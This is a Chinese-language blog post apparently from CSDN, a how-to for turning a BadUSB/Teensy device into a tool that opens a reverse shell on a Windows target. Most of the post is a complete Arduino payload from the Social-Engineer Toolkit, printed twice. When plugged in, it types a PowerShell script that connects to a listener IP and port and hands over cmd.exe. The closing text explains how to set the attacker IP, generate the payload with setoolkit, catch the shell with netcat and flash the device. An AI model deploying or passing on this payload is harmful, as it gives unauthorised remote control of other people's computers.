badusb_nc反弹shell_利用badusb反弹shell-CSDN博客

本文链接：https://blog.csdn.net/B0rn_T0_W1n/article/details/50512659

转载请注明来自 b0t0w1’blog

思路为运用powershell连接监听机，把powershell的命令烧录进badusb中。

payload：

//
// Social-Engineer Toolkit Teensy Attack Vector
// Written by: Dave Kennedy (ReL1K) and Josh Kelley (WinFaNG)
//
// Special thanks to: Irongeek
// You will need to setup a netcat listener MSF cannot handle this payload
//
// 2011-02-28 padzero@gmail.com
// * Added "ALT code" print functions (ascii_*): Fixed payload execution on non-english keymap targets
// * Changed from script to interactive powershell execution: Bypass Restricted Powershell Execution Policies
//

#define ascii_println Keyboard.println

void setup() { 
  delay(10000);
  omg("powershell");
  delay(1000);
  // Here is the payload...
  // This is a reverse bind shell through powershell.  I need to fix it use the 
  // bind shell.  The reverse bind shell code is cleaner though.
  // I bet we could use the dip switches to configure the IP addy or port...
  ascii_println("function cleanup {");
  ascii_println("if ($client.Connected -eq $true) {$client.Close()}");
  ascii_println("if ($process.ExitCode -ne $null) {$process.Close()}");
  ascii_println("exit}");
  // Setup 192.168.99.130 HERE
  ascii_println("$address = '192.168.99.130'");
  // Setup PORT HERE
  ascii_println("$port = '4444'");
  ascii_println("$client = New-Object system.net.sockets.tcpclient");
  ascii_println("$client.connect($address,$port)");
  ascii_println("$stream = $client.GetStream()");
  ascii_println("$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize");
  ascii_println("$process = New-Object System.Diagnostics.Process");
  ascii_println("$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'");
  ascii_println("$process.StartInfo.RedirectStandardInput = 1");
  ascii_println("$process.StartInfo.RedirectStandardOutput = 1");
  ascii_println("$process.StartInfo.UseShellExecute = 0");
  ascii_println("$process.Start()");
  ascii_println("$inputstream = $process.StandardInput");
  ascii_println("$outputstream = $process.StandardOutput");
  ascii_println("Start-Sleep 1");
  ascii_println("$encoding = new-object System.Text.AsciiEncoding");
  ascii_println("while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}");
  ascii_println("$stream.Write($encoding.GetBytes($out),0,$out.Length)");
  ascii_println("$out = $null; $done = $false; $testing = 0;");
  ascii_println("while (-not $done) {");
  ascii_println("if ($client.Connected -ne $true) {cleanup}");
  ascii_println("$pos = 0; $i = 1");
  ascii_println("while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {");
  ascii_println("$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)");
  ascii_println("$pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}");
  ascii_println("if ($pos -gt 0) {");
  ascii_println("$string = $encoding.GetString($networkbuffer,0,$pos)");
  ascii_println("$inputstream.write($string)");
  ascii_println("start-sleep 1");
  ascii_println("if ($process.ExitCode -ne $null) {cleanup}");
  ascii_println("else {");
  ascii_println("$out = $encoding.GetString($outputstream.Read())");
  ascii_println("while($outputstream.Peek() -ne -1){");
  ascii_println("$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}");
  ascii_println("$stream.Write($encoding.GetBytes($out),0,$out.length)");
  ascii_println("$out = $null");
  ascii_println("$string = $null}} else {cleanup}}");
  ascii_println(""); //Enter to start execution
}

void loop() {
}

void omg(char *SomeCommand)
{
  Keyboard.set_modifier(128); 
  Keyboard.set_key1(KEY_R);
  Keyboard.send_now(); 
  Keyboard.set_modifier(0); 
  Keyboard.set_key1(0); 
  Keyboard.send_now(); 
  delay(1500);
  ascii_println(SomeCommand);
}//
// Social-Engineer Toolkit Teensy Attack Vector
// Written by: Dave Kennedy (ReL1K) and Josh Kelley (WinFaNG)
//
// Special thanks to: Irongeek
// You will need to setup a netcat listener MSF cannot handle this payload
//
// 2011-02-28 padzero@gmail.com
// * Added "ALT code" print functions (ascii_*): Fixed payload execution on non-english keymap targets
// * Changed from script to interactive powershell execution: Bypass Restricted Powershell Execution Policies
//

#define ascii_println Keyboard.println

void setup() { 
  delay(10000);
  omg("powershell");
  delay(1000);
  // Here is the payload...
  // This is a reverse bind shell through powershell.  I need to fix it use the 
  // bind shell.  The reverse bind shell code is cleaner though.
  // I bet we could use the dip switches to configure the IP addy or port...
  ascii_println("function cleanup {");
  ascii_println("if ($client.Connected -eq $true) {$client.Close()}");
  ascii_println("if ($process.ExitCode -ne $null) {$process.Close()}");
  ascii_println("exit}");
  // Setup 192.168.99.130 HERE
  ascii_println("$address = '192.168.99.130'");
  // Setup PORT HERE
  ascii_println("$port = '4444'");
  ascii_println("$client = New-Object system.net.sockets.tcpclient");
  ascii_println("$client.connect($address,$port)");
  ascii_println("$stream = $client.GetStream()");
  ascii_println("$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize");
  ascii_println("$process = New-Object System.Diagnostics.Process");
  ascii_println("$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'");
  ascii_println("$process.StartInfo.RedirectStandardInput = 1");
  ascii_println("$process.StartInfo.RedirectStandardOutput = 1");
  ascii_println("$process.StartInfo.UseShellExecute = 0");
  ascii_println("$process.Start()");
  ascii_println("$inputstream = $process.StandardInput");
  ascii_println("$outputstream = $process.StandardOutput");
  ascii_println("Start-Sleep 1");
  ascii_println("$encoding = new-object System.Text.AsciiEncoding");
  ascii_println("while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}");
  ascii_println("$stream.Write($encoding.GetBytes($out),0,$out.Length)");
  ascii_println("$out = $null; $done = $false; $testing = 0;");
  ascii_println("while (-not $done) {");
  ascii_println("if ($client.Connected -ne $true) {cleanup}");
  ascii_println("$pos = 0; $i = 1");
  ascii_println("while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {");
  ascii_println("$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)");
  ascii_println("$pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}");
  ascii_println("if ($pos -gt 0) {");
  ascii_println("$string = $encoding.GetString($networkbuffer,0,$pos)");
  ascii_println("$inputstream.write($string)");
  ascii_println("start-sleep 1");
  ascii_println("if ($process.ExitCode -ne $null) {cleanup}");
  ascii_println("else {");
  ascii_println("$out = $encoding.GetString($outputstream.Read())");
  ascii_println("while($outputstream.Peek() -ne -1){");
  ascii_println("$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}");
  ascii_println("$stream.Write($encoding.GetBytes($out),0,$out.length)");
  ascii_println("$out = $null");
  ascii_println("$string = $null}} else {cleanup}}");
  ascii_println(""); //Enter to start execution
}

void loop() {
}

void omg(char *SomeCommand)
{
  Keyboard.set_modifier(128); 
  Keyboard.set_key1(KEY_R);
  Keyboard.send_now(); 
  Keyboard.set_modifier(0); 
  Keyboard.set_key1(0); 
  Keyboard.send_now(); 
  delay(1500);
  ascii_println(SomeCommand);
}

这里使用靶机的powershell连接监听机。如果是xp等则没有用。
payload是kali set 工具箱中给出的payload代码，使用时需要该的地方是109行和111行的ip以及端口号。ip为监听的ip，推荐使用linux监听，port是监听所用的端口。或者可以亲自在kali中生成：
在 terminal 中输入：

setoolkit

进去后依次选择1、6、3。即可生成。
前面的注释信息也指出，这里必须用 nc 进行监听
这里写图片描述
使用meterpreter不会成功.

显示貌似获得了shell，其实并没有得到meterpreter。

使用 nc 监听4444端口，获得了靶机的shell。
使用方法依然是跟以前一样，把payload保存为 .pde 格式，直接拖进arduino即可，然后烧录。